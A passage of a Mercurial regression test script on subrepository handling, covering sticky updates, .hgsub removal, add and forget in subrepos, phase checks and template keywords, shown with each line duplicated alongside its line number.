1234 $ hg id
1234 $ hg id
1235 365661e5936a
1235 365661e5936a
1236 $ hg -R s id
1236 $ hg -R s id
1237 fc627a69481f
1237 fc627a69481f
1238 $ hg -R t id
1238 $ hg -R t id
1239 e95bcfa18a35
1239 e95bcfa18a35
1240
1240
1241 Sticky subrepositories, file changes
1241 Sticky subrepositories, file changes
1242 $ touch s/f1
1242 $ touch s/f1
1243 $ touch t/f1
1243 $ touch t/f1
1244 $ hg add -S s/f1
1244 $ hg add -S s/f1
1245 $ hg add -S t/f1
1245 $ hg add -S t/f1
1246 $ hg id
1246 $ hg id
1247 365661e5936a+
1247 365661e5936a+
1248 $ hg -R s id
1248 $ hg -R s id
1249 fc627a69481f+
1249 fc627a69481f+
1250 $ hg -R t id
1250 $ hg -R t id
1251 e95bcfa18a35+
1251 e95bcfa18a35+
1252 $ hg update tip
1252 $ hg update tip
1253 subrepository s diverged (local revision: fc627a69481f, remote revision: 12a213df6fa9)
1253 subrepository s diverged (local revision: fc627a69481f, remote revision: 12a213df6fa9)
1254 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1254 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1255 subrepository sources for s differ
1255 subrepository sources for s differ
1256 use (l)ocal source (fc627a69481f) or (r)emote source (12a213df6fa9)? l
1256 use (l)ocal source (fc627a69481f) or (r)emote source (12a213df6fa9)? l
1257 subrepository t diverged (local revision: e95bcfa18a35, remote revision: 52c0adc0515a)
1257 subrepository t diverged (local revision: e95bcfa18a35, remote revision: 52c0adc0515a)
1258 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1258 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1259 subrepository sources for t differ
1259 subrepository sources for t differ
1260 use (l)ocal source (e95bcfa18a35) or (r)emote source (52c0adc0515a)? l
1260 use (l)ocal source (e95bcfa18a35) or (r)emote source (52c0adc0515a)? l
1261 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1261 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1262 $ hg id
1262 $ hg id
1263 925c17564ef8+ tip
1263 925c17564ef8+ tip
1264 $ hg -R s id
1264 $ hg -R s id
1265 fc627a69481f+
1265 fc627a69481f+
1266 $ hg -R t id
1266 $ hg -R t id
1267 e95bcfa18a35+
1267 e95bcfa18a35+
1268 $ hg update --clean tip
1268 $ hg update --clean tip
1269 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1269 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1270
1270
1271 Sticky subrepository, revision updates
1271 Sticky subrepository, revision updates
1272 $ hg id
1272 $ hg id
1273 925c17564ef8 tip
1273 925c17564ef8 tip
1274 $ hg -R s id
1274 $ hg -R s id
1275 12a213df6fa9 tip
1275 12a213df6fa9 tip
1276 $ hg -R t id
1276 $ hg -R t id
1277 52c0adc0515a tip
1277 52c0adc0515a tip
1278 $ cd s
1278 $ cd s
1279 $ hg update -r -2
1279 $ hg update -r -2
1280 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1280 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1281 $ cd ../t
1281 $ cd ../t
1282 $ hg update -r 2
1282 $ hg update -r 2
1283 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1283 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1284 $ cd ..
1284 $ cd ..
1285 $ hg update 10
1285 $ hg update 10
1286 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1286 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1287 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1287 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1288 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 20a0db6fbf6c)
1288 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 20a0db6fbf6c)
1289 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1289 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1290 subrepository sources for t differ (in checked out version)
1290 subrepository sources for t differ (in checked out version)
1291 use (l)ocal source (7af322bc1198) or (r)emote source (20a0db6fbf6c)? l
1291 use (l)ocal source (7af322bc1198) or (r)emote source (20a0db6fbf6c)? l
1292 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1292 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1293 $ hg id
1293 $ hg id
1294 e45c8b14af55+
1294 e45c8b14af55+
1295 $ hg -R s id
1295 $ hg -R s id
1296 02dcf1d70411
1296 02dcf1d70411
1297 $ hg -R t id
1297 $ hg -R t id
1298 7af322bc1198
1298 7af322bc1198
1299
1299
1300 Sticky subrepository, file changes and revision updates
1300 Sticky subrepository, file changes and revision updates
1301 $ touch s/f1
1301 $ touch s/f1
1302 $ touch t/f1
1302 $ touch t/f1
1303 $ hg add -S s/f1
1303 $ hg add -S s/f1
1304 $ hg add -S t/f1
1304 $ hg add -S t/f1
1305 $ hg id
1305 $ hg id
1306 e45c8b14af55+
1306 e45c8b14af55+
1307 $ hg -R s id
1307 $ hg -R s id
1308 02dcf1d70411+
1308 02dcf1d70411+
1309 $ hg -R t id
1309 $ hg -R t id
1310 7af322bc1198+
1310 7af322bc1198+
1311 $ hg update tip
1311 $ hg update tip
1312 subrepository s diverged (local revision: 12a213df6fa9, remote revision: 12a213df6fa9)
1312 subrepository s diverged (local revision: 12a213df6fa9, remote revision: 12a213df6fa9)
1313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1314 subrepository sources for s differ
1314 subrepository sources for s differ
1315 use (l)ocal source (02dcf1d70411) or (r)emote source (12a213df6fa9)? l
1315 use (l)ocal source (02dcf1d70411) or (r)emote source (12a213df6fa9)? l
1316 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 52c0adc0515a)
1316 subrepository t diverged (local revision: 52c0adc0515a, remote revision: 52c0adc0515a)
1317 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1317 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1318 subrepository sources for t differ
1318 subrepository sources for t differ
1319 use (l)ocal source (7af322bc1198) or (r)emote source (52c0adc0515a)? l
1319 use (l)ocal source (7af322bc1198) or (r)emote source (52c0adc0515a)? l
1320 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1320 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1321 $ hg id
1321 $ hg id
1322 925c17564ef8+ tip
1322 925c17564ef8+ tip
1323 $ hg -R s id
1323 $ hg -R s id
1324 02dcf1d70411+
1324 02dcf1d70411+
1325 $ hg -R t id
1325 $ hg -R t id
1326 7af322bc1198+
1326 7af322bc1198+
1327
1327
1328 Sticky repository, update --clean
1328 Sticky repository, update --clean
1329 $ hg update --clean tip
1329 $ hg update --clean tip
1330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1331 $ hg id
1331 $ hg id
1332 925c17564ef8 tip
1332 925c17564ef8 tip
1333 $ hg -R s id
1333 $ hg -R s id
1334 12a213df6fa9 tip
1334 12a213df6fa9 tip
1335 $ hg -R t id
1335 $ hg -R t id
1336 52c0adc0515a tip
1336 52c0adc0515a tip
1337
1337
1338 Test subrepo already at intended revision:
1338 Test subrepo already at intended revision:
1339 $ cd s
1339 $ cd s
1340 $ hg update fc627a69481f
1340 $ hg update fc627a69481f
1341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1342 $ cd ..
1342 $ cd ..
1343 $ hg update 11
1343 $ hg update 11
1344 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1344 subrepository s diverged (local revision: 12a213df6fa9, remote revision: fc627a69481f)
1345 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1345 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
1346 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1346 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1347 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1347 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
1348 $ hg id -n
1348 $ hg id -n
1349 11+
1349 11+
1350 $ hg -R s id
1350 $ hg -R s id
1351 fc627a69481f
1351 fc627a69481f
1352 $ hg -R t id
1352 $ hg -R t id
1353 e95bcfa18a35
1353 e95bcfa18a35
1354
1354
1355 Test that removing .hgsubstate doesn't break anything:
1355 Test that removing .hgsubstate doesn't break anything:
1356
1356
1357 $ hg rm -f .hgsubstate
1357 $ hg rm -f .hgsubstate
1358 $ hg ci -mrm
1358 $ hg ci -mrm
1359 nothing changed
1359 nothing changed
1360 [1]
1360 [1]
1361 $ hg log -vr tip
1361 $ hg log -vr tip
1362 changeset: 13:925c17564ef8
1362 changeset: 13:925c17564ef8
1363 tag: tip
1363 tag: tip
1364 user: test
1364 user: test
1365 date: Thu Jan 01 00:00:00 1970 +0000
1365 date: Thu Jan 01 00:00:00 1970 +0000
1366 files: .hgsubstate
1366 files: .hgsubstate
1367 description:
1367 description:
1368 13
1368 13
1369
1369
1370
1370
1371
1371
1372 Test that removing .hgsub removes .hgsubstate:
1372 Test that removing .hgsub removes .hgsubstate:
1373
1373
1374 $ hg rm .hgsub
1374 $ hg rm .hgsub
1375 $ hg ci -mrm2
1375 $ hg ci -mrm2
1376 created new head
1376 created new head
1377 $ hg log -vr tip
1377 $ hg log -vr tip
1378 changeset: 14:2400bccd50af
1378 changeset: 14:2400bccd50af
1379 tag: tip
1379 tag: tip
1380 parent: 11:365661e5936a
1380 parent: 11:365661e5936a
1381 user: test
1381 user: test
1382 date: Thu Jan 01 00:00:00 1970 +0000
1382 date: Thu Jan 01 00:00:00 1970 +0000
1383 files: .hgsub .hgsubstate
1383 files: .hgsub .hgsubstate
1384 description:
1384 description:
1385 rm2
1385 rm2
1386
1386
1387
1387
1388 Test issue3153: diff -S with deleted subrepos
1388 Test issue3153: diff -S with deleted subrepos
1389
1389
1390 $ hg diff --nodates -S -c .
1390 $ hg diff --nodates -S -c .
1391 diff -r 365661e5936a -r 2400bccd50af .hgsub
1391 diff -r 365661e5936a -r 2400bccd50af .hgsub
1392 --- a/.hgsub
1392 --- a/.hgsub
1393 +++ /dev/null
1393 +++ /dev/null
1394 @@ -1,2 +0,0 @@
1394 @@ -1,2 +0,0 @@
1395 -s = s
1395 -s = s
1396 -t = t
1396 -t = t
1397 diff -r 365661e5936a -r 2400bccd50af .hgsubstate
1397 diff -r 365661e5936a -r 2400bccd50af .hgsubstate
1398 --- a/.hgsubstate
1398 --- a/.hgsubstate
1399 +++ /dev/null
1399 +++ /dev/null
1400 @@ -1,2 +0,0 @@
1400 @@ -1,2 +0,0 @@
1401 -fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1401 -fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1402 -e95bcfa18a358dc4936da981ebf4147b4cad1362 t
1402 -e95bcfa18a358dc4936da981ebf4147b4cad1362 t
1403
1403
1404 Test behavior of add for explicit path in subrepo:
1404 Test behavior of add for explicit path in subrepo:
1405 $ cd ..
1405 $ cd ..
1406 $ hg init explicit
1406 $ hg init explicit
1407 $ cd explicit
1407 $ cd explicit
1408 $ echo s = s > .hgsub
1408 $ echo s = s > .hgsub
1409 $ hg add .hgsub
1409 $ hg add .hgsub
1410 $ hg init s
1410 $ hg init s
1411 $ hg ci -m0
1411 $ hg ci -m0
1412 Adding with an explicit path in a subrepo adds the file
1412 Adding with an explicit path in a subrepo adds the file
1413 $ echo c1 > f1
1413 $ echo c1 > f1
1414 $ echo c2 > s/f2
1414 $ echo c2 > s/f2
1415 $ hg st -S
1415 $ hg st -S
1416 ? f1
1416 ? f1
1417 ? s/f2
1417 ? s/f2
1418 $ hg add s/f2
1418 $ hg add s/f2
1419 $ hg st -S
1419 $ hg st -S
1420 A s/f2
1420 A s/f2
1421 ? f1
1421 ? f1
1422 $ hg ci -R s -m0
1422 $ hg ci -R s -m0
1423 $ hg ci -Am1
1423 $ hg ci -Am1
1424 adding f1
1424 adding f1
1425 Adding with an explicit path in a subrepo with -S has the same behavior
1425 Adding with an explicit path in a subrepo with -S has the same behavior
1426 $ echo c3 > f3
1426 $ echo c3 > f3
1427 $ echo c4 > s/f4
1427 $ echo c4 > s/f4
1428 $ hg st -S
1428 $ hg st -S
1429 ? f3
1429 ? f3
1430 ? s/f4
1430 ? s/f4
1431 $ hg add -S s/f4
1431 $ hg add -S s/f4
1432 $ hg st -S
1432 $ hg st -S
1433 A s/f4
1433 A s/f4
1434 ? f3
1434 ? f3
1435 $ hg ci -R s -m1
1435 $ hg ci -R s -m1
1436 $ hg ci -Ama2
1436 $ hg ci -Ama2
1437 adding f3
1437 adding f3
1438 Adding without a path or pattern silently ignores subrepos
1438 Adding without a path or pattern silently ignores subrepos
1439 $ echo c5 > f5
1439 $ echo c5 > f5
1440 $ echo c6 > s/f6
1440 $ echo c6 > s/f6
1441 $ echo c7 > s/f7
1441 $ echo c7 > s/f7
1442 $ hg st -S
1442 $ hg st -S
1443 ? f5
1443 ? f5
1444 ? s/f6
1444 ? s/f6
1445 ? s/f7
1445 ? s/f7
1446 $ hg add
1446 $ hg add
1447 adding f5
1447 adding f5
1448 $ hg st -S
1448 $ hg st -S
1449 A f5
1449 A f5
1450 ? s/f6
1450 ? s/f6
1451 ? s/f7
1451 ? s/f7
1452 $ hg ci -R s -Am2
1452 $ hg ci -R s -Am2
1453 adding f6
1453 adding f6
1454 adding f7
1454 adding f7
1455 $ hg ci -m3
1455 $ hg ci -m3
1456 Adding without a path or pattern with -S also adds files in subrepos
1456 Adding without a path or pattern with -S also adds files in subrepos
1457 $ echo c8 > f8
1457 $ echo c8 > f8
1458 $ echo c9 > s/f9
1458 $ echo c9 > s/f9
1459 $ echo c10 > s/f10
1459 $ echo c10 > s/f10
1460 $ hg st -S
1460 $ hg st -S
1461 ? f8
1461 ? f8
1462 ? s/f10
1462 ? s/f10
1463 ? s/f9
1463 ? s/f9
1464 $ hg add -S
1464 $ hg add -S
1465 adding f8
1465 adding f8
1466 adding s/f10 (glob)
1466 adding s/f10 (glob)
1467 adding s/f9 (glob)
1467 adding s/f9 (glob)
1468 $ hg st -S
1468 $ hg st -S
1469 A f8
1469 A f8
1470 A s/f10
1470 A s/f10
1471 A s/f9
1471 A s/f9
1472 $ hg ci -R s -m3
1472 $ hg ci -R s -m3
1473 $ hg ci -m4
1473 $ hg ci -m4
1474 Adding with a pattern silently ignores subrepos
1474 Adding with a pattern silently ignores subrepos
1475 $ echo c11 > fm11
1475 $ echo c11 > fm11
1476 $ echo c12 > fn12
1476 $ echo c12 > fn12
1477 $ echo c13 > s/fm13
1477 $ echo c13 > s/fm13
1478 $ echo c14 > s/fn14
1478 $ echo c14 > s/fn14
1479 $ hg st -S
1479 $ hg st -S
1480 ? fm11
1480 ? fm11
1481 ? fn12
1481 ? fn12
1482 ? s/fm13
1482 ? s/fm13
1483 ? s/fn14
1483 ? s/fn14
1484 $ hg add 'glob:**fm*'
1484 $ hg add 'glob:**fm*'
1485 adding fm11
1485 adding fm11
1486 $ hg st -S
1486 $ hg st -S
1487 A fm11
1487 A fm11
1488 ? fn12
1488 ? fn12
1489 ? s/fm13
1489 ? s/fm13
1490 ? s/fn14
1490 ? s/fn14
1491 $ hg ci -R s -Am4
1491 $ hg ci -R s -Am4
1492 adding fm13
1492 adding fm13
1493 adding fn14
1493 adding fn14
1494 $ hg ci -Am5
1494 $ hg ci -Am5
1495 adding fn12
1495 adding fn12
1496 Adding with a pattern with -S also adds matches in subrepos
1496 Adding with a pattern with -S also adds matches in subrepos
1497 $ echo c15 > fm15
1497 $ echo c15 > fm15
1498 $ echo c16 > fn16
1498 $ echo c16 > fn16
1499 $ echo c17 > s/fm17
1499 $ echo c17 > s/fm17
1500 $ echo c18 > s/fn18
1500 $ echo c18 > s/fn18
1501 $ hg st -S
1501 $ hg st -S
1502 ? fm15
1502 ? fm15
1503 ? fn16
1503 ? fn16
1504 ? s/fm17
1504 ? s/fm17
1505 ? s/fn18
1505 ? s/fn18
1506 $ hg add -S 'glob:**fm*'
1506 $ hg add -S 'glob:**fm*'
1507 adding fm15
1507 adding fm15
1508 adding s/fm17 (glob)
1508 adding s/fm17 (glob)
1509 $ hg st -S
1509 $ hg st -S
1510 A fm15
1510 A fm15
1511 A s/fm17
1511 A s/fm17
1512 ? fn16
1512 ? fn16
1513 ? s/fn18
1513 ? s/fn18
1514 $ hg ci -R s -Am5
1514 $ hg ci -R s -Am5
1515 adding fn18
1515 adding fn18
1516 $ hg ci -Am6
1516 $ hg ci -Am6
1517 adding fn16
1517 adding fn16
1518
1518
1519 Test behavior of forget for explicit path in subrepo:
1519 Test behavior of forget for explicit path in subrepo:
1520 Forgetting an explicit path in a subrepo untracks the file
1520 Forgetting an explicit path in a subrepo untracks the file
1521 $ echo c19 > s/f19
1521 $ echo c19 > s/f19
1522 $ hg add s/f19
1522 $ hg add s/f19
1523 $ hg st -S
1523 $ hg st -S
1524 A s/f19
1524 A s/f19
1525 $ hg forget s/f19
1525 $ hg forget s/f19
1526 $ hg st -S
1526 $ hg st -S
1527 ? s/f19
1527 ? s/f19
1528 $ rm s/f19
1528 $ rm s/f19
1529 $ cd ..
1529 $ cd ..
1530
1530
1531 Courtesy phases synchronisation to publishing server does not block the push
1531 Courtesy phases synchronisation to publishing server does not block the push
1532 (issue3781)
1532 (issue3781)
1533
1533
1534 $ cp -R main issue3781
1534 $ cp -R main issue3781
1535 $ cp -R main issue3781-dest
1535 $ cp -R main issue3781-dest
1536 $ cd issue3781-dest/s
1536 $ cd issue3781-dest/s
1537 $ hg phase tip # show we have draft changeset
1537 $ hg phase tip # show we have draft changeset
1538 5: draft
1538 5: draft
1539 $ chmod a-w .hg/store/phaseroots # prevent phase push
1539 $ chmod a-w .hg/store/phaseroots # prevent phase push
1540 $ cd ../../issue3781
1540 $ cd ../../issue3781
1541 $ cat >> .hg/hgrc << EOF
1541 $ cat >> .hg/hgrc << EOF
1542 > [paths]
1542 > [paths]
1543 > default=../issue3781-dest/
1543 > default=../issue3781-dest/
1544 > EOF
1544 > EOF
1545 $ hg push --config devel.legacy.exchange=bundle1
1545 $ hg push --config devel.legacy.exchange=bundle1
1546 pushing to $TESTTMP/issue3781-dest (glob)
1546 pushing to $TESTTMP/issue3781-dest (glob)
1547 pushing subrepo s to $TESTTMP/issue3781-dest/s
1547 pushing subrepo s to $TESTTMP/issue3781-dest/s
1548 searching for changes
1548 searching for changes
1549 no changes found
1549 no changes found
1550 searching for changes
1550 searching for changes
1551 no changes found
1551 no changes found
1552 [1]
1552 [1]
1553 # clean the push cache
1553 # clean the push cache
1554 $ rm s/.hg/cache/storehash/*
1554 $ rm s/.hg/cache/storehash/*
1555 $ hg push # bundle2+
1555 $ hg push # bundle2+
1556 pushing to $TESTTMP/issue3781-dest (glob)
1556 pushing to $TESTTMP/issue3781-dest (glob)
1557 pushing subrepo s to $TESTTMP/issue3781-dest/s
1557 pushing subrepo s to $TESTTMP/issue3781-dest/s
1558 searching for changes
1558 searching for changes
1559 no changes found
1559 no changes found
1560 searching for changes
1560 searching for changes
1561 no changes found
1561 no changes found
1562 [1]
1562 [1]
1563 $ cd ..
1563 $ cd ..
1564
1564
1565 Test phase choice for newly created commit with "phases.subrepochecks"
1565 Test phase choice for newly created commit with "phases.subrepochecks"
1566 configuration
1566 configuration
1567
1567
1568 $ cd t
1568 $ cd t
1569 $ hg update -q -r 12
1569 $ hg update -q -r 12
1570
1570
1571 $ cat >> s/ss/.hg/hgrc <<EOF
1571 $ cat >> s/ss/.hg/hgrc <<EOF
1572 > [phases]
1572 > [phases]
1573 > new-commit = secret
1573 > new-commit = secret
1574 > EOF
1574 > EOF
1575 $ cat >> s/.hg/hgrc <<EOF
1575 $ cat >> s/.hg/hgrc <<EOF
1576 > [phases]
1576 > [phases]
1577 > new-commit = draft
1577 > new-commit = draft
1578 > EOF
1578 > EOF
1579 $ echo phasecheck1 >> s/ss/a
1579 $ echo phasecheck1 >> s/ss/a
1580 $ hg -R s commit -S --config phases.checksubrepos=abort -m phasecheck1
1580 $ hg -R s commit -S --config phases.checksubrepos=abort -m phasecheck1
1581 committing subrepository ss
1581 committing subrepository ss
1582 transaction abort!
1582 transaction abort!
1583 rollback completed
1583 rollback completed
1584 abort: can't commit in draft phase conflicting secret from subrepository ss
1584 abort: can't commit in draft phase conflicting secret from subrepository ss
1585 [255]
1585 [255]
1586 $ echo phasecheck2 >> s/ss/a
1586 $ echo phasecheck2 >> s/ss/a
1587 $ hg -R s commit -S --config phases.checksubrepos=ignore -m phasecheck2
1587 $ hg -R s commit -S --config phases.checksubrepos=ignore -m phasecheck2
1588 committing subrepository ss
1588 committing subrepository ss
1589 $ hg -R s/ss phase tip
1589 $ hg -R s/ss phase tip
1590 3: secret
1590 3: secret
1591 $ hg -R s phase tip
1591 $ hg -R s phase tip
1592 6: draft
1592 6: draft
1593 $ echo phasecheck3 >> s/ss/a
1593 $ echo phasecheck3 >> s/ss/a
1594 $ hg -R s commit -S -m phasecheck3
1594 $ hg -R s commit -S -m phasecheck3
1595 committing subrepository ss
1595 committing subrepository ss
1596 warning: changes are committed in secret phase from subrepository ss
1596 warning: changes are committed in secret phase from subrepository ss
1597 $ hg -R s/ss phase tip
1597 $ hg -R s/ss phase tip
1598 4: secret
1598 4: secret
1599 $ hg -R s phase tip
1599 $ hg -R s phase tip
1600 7: secret
1600 7: secret
1601
1601
1602 $ cat >> t/.hg/hgrc <<EOF
1602 $ cat >> t/.hg/hgrc <<EOF
1603 > [phases]
1603 > [phases]
1604 > new-commit = draft
1604 > new-commit = draft
1605 > EOF
1605 > EOF
1606 $ cat >> .hg/hgrc <<EOF
1606 $ cat >> .hg/hgrc <<EOF
1607 > [phases]
1607 > [phases]
1608 > new-commit = public
1608 > new-commit = public
1609 > EOF
1609 > EOF
1610 $ echo phasecheck4 >> s/ss/a
1610 $ echo phasecheck4 >> s/ss/a
1611 $ echo phasecheck4 >> t/t
1611 $ echo phasecheck4 >> t/t
1612 $ hg commit -S -m phasecheck4
1612 $ hg commit -S -m phasecheck4
1613 committing subrepository s
1613 committing subrepository s
1614 committing subrepository s/ss (glob)
1614 committing subrepository s/ss (glob)
1615 warning: changes are committed in secret phase from subrepository ss
1615 warning: changes are committed in secret phase from subrepository ss
1616 committing subrepository t
1616 committing subrepository t
1617 warning: changes are committed in secret phase from subrepository s
1617 warning: changes are committed in secret phase from subrepository s
1618 created new head
1618 created new head
1619 $ hg -R s/ss phase tip
1619 $ hg -R s/ss phase tip
1620 5: secret
1620 5: secret
1621 $ hg -R s phase tip
1621 $ hg -R s phase tip
1622 8: secret
1622 8: secret
1623 $ hg -R t phase tip
1623 $ hg -R t phase tip
1624 6: draft
1624 6: draft
1625 $ hg phase tip
1625 $ hg phase tip
1626 15: secret
1626 15: secret
1627
1627
1628 $ cd ..
1628 $ cd ..
1629
1629
1630
1630
1631 Test that commit --secret works on both repo and subrepo (issue4182)
1631 Test that commit --secret works on both repo and subrepo (issue4182)
1632
1632
1633 $ cd main
1633 $ cd main
1634 $ echo secret >> b
1634 $ echo secret >> b
1635 $ echo secret >> s/b
1635 $ echo secret >> s/b
1636 $ hg commit --secret --subrepo -m "secret"
1636 $ hg commit --secret --subrepo -m "secret"
1637 committing subrepository s
1637 committing subrepository s
1638 $ hg phase -r .
1638 $ hg phase -r .
1639 6: secret
1639 6: secret
1640 $ cd s
1640 $ cd s
1641 $ hg phase -r .
1641 $ hg phase -r .
1642 6: secret
1642 6: secret
1643 $ cd ../../
1643 $ cd ../../
1644
1644
1645 Test "subrepos" template keyword
1645 Test "subrepos" template keyword
1646
1646
1647 $ cd t
1647 $ cd t
1648 $ hg update -q 15
1648 $ hg update -q 15
1649 $ cat > .hgsub <<EOF
1649 $ cat > .hgsub <<EOF
1650 > s = s
1650 > s = s
1651 > EOF
1651 > EOF
1652 $ hg commit -m "16"
1652 $ hg commit -m "16"
1653 warning: changes are committed in secret phase from subrepository s
1653 warning: changes are committed in secret phase from subrepository s
1654
1654
1655 (addition of ".hgsub" itself)
1655 (addition of ".hgsub" itself)
1656
1656
1657 $ hg diff --nodates -c 1 .hgsubstate
1657 $ hg diff --nodates -c 1 .hgsubstate
1658 diff -r f7b1eb17ad24 -r 7cf8cfea66e4 .hgsubstate
1658 diff -r f7b1eb17ad24 -r 7cf8cfea66e4 .hgsubstate
1659 --- /dev/null
1659 --- /dev/null
1660 +++ b/.hgsubstate
1660 +++ b/.hgsubstate
1661 @@ -0,0 +1,1 @@
1661 @@ -0,0 +1,1 @@
1662 +e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1662 +e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1663 $ hg log -r 1 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1663 $ hg log -r 1 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1664 f7b1eb17ad24 000000000000
1664 f7b1eb17ad24 000000000000
1665 s
1665 s
1666
1666
1667 (modification of existing entry)
1667 (modification of existing entry)
1668
1668
1669 $ hg diff --nodates -c 2 .hgsubstate
1669 $ hg diff --nodates -c 2 .hgsubstate
1670 diff -r 7cf8cfea66e4 -r df30734270ae .hgsubstate
1670 diff -r 7cf8cfea66e4 -r df30734270ae .hgsubstate
1671 --- a/.hgsubstate
1671 --- a/.hgsubstate
1672 +++ b/.hgsubstate
1672 +++ b/.hgsubstate
1673 @@ -1,1 +1,1 @@
1673 @@ -1,1 +1,1 @@
1674 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1674 -e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1675 +dc73e2e6d2675eb2e41e33c205f4bdab4ea5111d s
1675 +dc73e2e6d2675eb2e41e33c205f4bdab4ea5111d s
1676 $ hg log -r 2 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1676 $ hg log -r 2 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1677 7cf8cfea66e4 000000000000
1677 7cf8cfea66e4 000000000000
1678 s
1678 s
1679
1679
1680 (addition of entry)
1680 (addition of entry)
1681
1681
1682 $ hg diff --nodates -c 5 .hgsubstate
1682 $ hg diff --nodates -c 5 .hgsubstate
1683 diff -r 7cf8cfea66e4 -r 1f14a2e2d3ec .hgsubstate
1683 diff -r 7cf8cfea66e4 -r 1f14a2e2d3ec .hgsubstate
1684 --- a/.hgsubstate
1684 --- a/.hgsubstate
1685 +++ b/.hgsubstate
1685 +++ b/.hgsubstate
1686 @@ -1,1 +1,2 @@
1686 @@ -1,1 +1,2 @@
1687 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1687 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
1688 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1688 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1689 $ hg log -r 5 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1689 $ hg log -r 5 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1690 7cf8cfea66e4 000000000000
1690 7cf8cfea66e4 000000000000
1691 t
1691 t
1692
1692
1693 (removal of existing entry)
1693 (removal of existing entry)
1694
1694
1695 $ hg diff --nodates -c 16 .hgsubstate
1695 $ hg diff --nodates -c 16 .hgsubstate
1696 diff -r 8bec38d2bd0b -r f2f70bc3d3c9 .hgsubstate
1696 diff -r 8bec38d2bd0b -r f2f70bc3d3c9 .hgsubstate
1697 --- a/.hgsubstate
1697 --- a/.hgsubstate
1698 +++ b/.hgsubstate
1698 +++ b/.hgsubstate
1699 @@ -1,2 +1,1 @@
1699 @@ -1,2 +1,1 @@
1700 0731af8ca9423976d3743119d0865097c07bdc1b s
1700 0731af8ca9423976d3743119d0865097c07bdc1b s
1701 -e202dc79b04c88a636ea8913d9182a1346d9b3dc t
1701 -e202dc79b04c88a636ea8913d9182a1346d9b3dc t
1702 $ hg log -r 16 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1702 $ hg log -r 16 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1703 8bec38d2bd0b 000000000000
1703 8bec38d2bd0b 000000000000
1704 t
1704 t
1705
1705
1706 (merging)
1706 (merging)
1707
1707
1708 $ hg diff --nodates -c 9 .hgsubstate
1708 $ hg diff --nodates -c 9 .hgsubstate
1709 diff -r f6affe3fbfaa -r f0d2028bf86d .hgsubstate
1709 diff -r f6affe3fbfaa -r f0d2028bf86d .hgsubstate
1710 --- a/.hgsubstate
1710 --- a/.hgsubstate
1711 +++ b/.hgsubstate
1711 +++ b/.hgsubstate
1712 @@ -1,1 +1,2 @@
1712 @@ -1,1 +1,2 @@
1713 fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1713 fc627a69481fcbe5f1135069e8a3881c023e4cf5 s
1714 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1714 +60ca1237c19474e7a3978b0dc1ca4e6f36d51382 t
1715 $ hg log -r 9 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1715 $ hg log -r 9 --template "{p1node|short} {p2node|short}\n{subrepos % '{subrepo}\n'}"
1716 f6affe3fbfaa 1f14a2e2d3ec
1716 f6affe3fbfaa 1f14a2e2d3ec
1717 t
1717 t
1718
1718
1719 (removal of ".hgsub" itself)
